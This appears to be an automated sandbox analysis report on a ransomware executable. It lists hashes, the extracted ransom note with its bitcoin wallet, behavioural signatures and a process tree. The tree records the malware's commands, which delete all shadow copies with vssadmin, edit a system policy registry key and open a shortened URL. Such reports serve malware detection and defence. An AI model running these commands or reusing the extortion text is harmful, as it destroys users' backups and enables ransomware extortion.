Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    30/10/2020, 05:07

General

  • Target

    6.exe_.exe

  • Size

    26KB

  • MD5

    0f0d5631cc8749e8a8a2f61ca909dcfc

  • SHA1

    ee79e938a80d1d0a955899f56d5f8f37bee38de0

  • SHA256

    e404f26379df9df89844dbd55120dccf383c3b793e0f08d84ee40f82d0cc334a

  • SHA512

    5b1560a5029155519af379cf9d0cce82a0d96fe7fb6af3888310a83fd45ac32ee9dd110f43721cd2313cb33fee9739bf86470b3083c5c4b75a74837a19bc0b0c

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\HELP_DECRYPT_YOUR_FILES.txt

Ransom Note

Oops All Of your important files were encrypted Like document pictures videos etc.. Don't worry, you can return all your files! All your files, documents, photos, databases and other important files are encrypted by a strong encryption. How to recover files? RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key. The only method of recovering files is to purchase an unique private key.Only we can give you this key and only we can recover your files. What guarantees you have? As evidence, you can send us 1 file to decrypt by email We will send you a recovery file Prove that we can decrypt your file Please You must follow these steps carefully to decrypt your files: Send $200 worth of bitcoin to wallet: 3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq after payment,we will send you Decryptor software contact email: [email protected] Your personal ID: d09TwldPIleGCR2Y1zdbtIoE64jLQTrKMQfIhztxUqd4j3PCaIGCeNqrxj1ZBQa/MZd+ProqyE6NQmq7tOfrl4EtnfZn+5catCOgp8Rnohnq97ELsWjoUTXPdLejXeSbPOBXp804zv6pJuLtvO1LAfJ0qm1lMFCur0R9JSttCbA=

Wallets

3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies service 2 TTPs 5 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6.exe_.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe_.exe"
    1⤵
    • Modifies extensions of user files
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\System32\reg.exe
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2000
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1292
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1560
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://2no.co/1SHYt7
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:848 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:760
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1956

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/900-10-0x000007FEF5350000-0x000007FEF55CA000-memory.dmp

    Filesize

    2.5MB

  • memory/1688-0-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp

    Filesize

    9.9MB

  • memory/1688-1-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

    Filesize

    4KB